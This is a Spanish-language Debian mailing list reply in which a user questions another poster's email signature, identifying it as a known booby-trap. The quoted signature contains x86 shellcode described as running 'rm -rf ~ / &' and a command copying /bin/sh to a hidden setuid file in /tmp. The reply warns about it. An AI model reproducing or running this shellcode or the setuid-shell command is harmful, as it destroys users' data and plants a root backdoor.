[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: [OT] Financiada la liberación de The Debian Administrator's Handbook



2012/5/3 Francisco Antonio <francisc.dbf@linuxmail.org>:
> Estimados,
>
>
> Leí este articulo
> http://debian.barrapunto.com/article.pl?sid=12/05/02/199200&from=rss SI ES
> CIERTO A LA ESPERA Y NADA GRACIAS.-
>
Gracias por compartirlo.
Ahora aclarame una duda, por favor.
¿Cual es la utilidad de incluir, como firma, código que es potencialmente
peligroso?
http://seclists.org/fulldisclosure/2007/Aug/71

Forma parte de un script que lo que intenta hacer es
*Smashes its own stack and runs "rm -rf ~ / &". *

Es decir, borrar todo de la raíz para abajo.
http://seclists.org/fulldisclosure/2007/Aug/74

Ese script es un clásico cazabobos, si no entiendo mal.

> --
>
>
>
> char esp[] _attribute_ ((section(".text"))) /* e.s.p
> release */
> = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
> "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
> "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
> "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
> "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
> "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
> "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
> "cp -p /bin/sh /tmp/.beyond; chmod 4755
> /tmp/.beyond;";
>
>> > Linux Counter ( http://counter.li.org )
>> > --------------*************************
>> > Usuario #551263



-- 
Jorge A Secreto
Analista de Sistemas
MP 361


Reply to: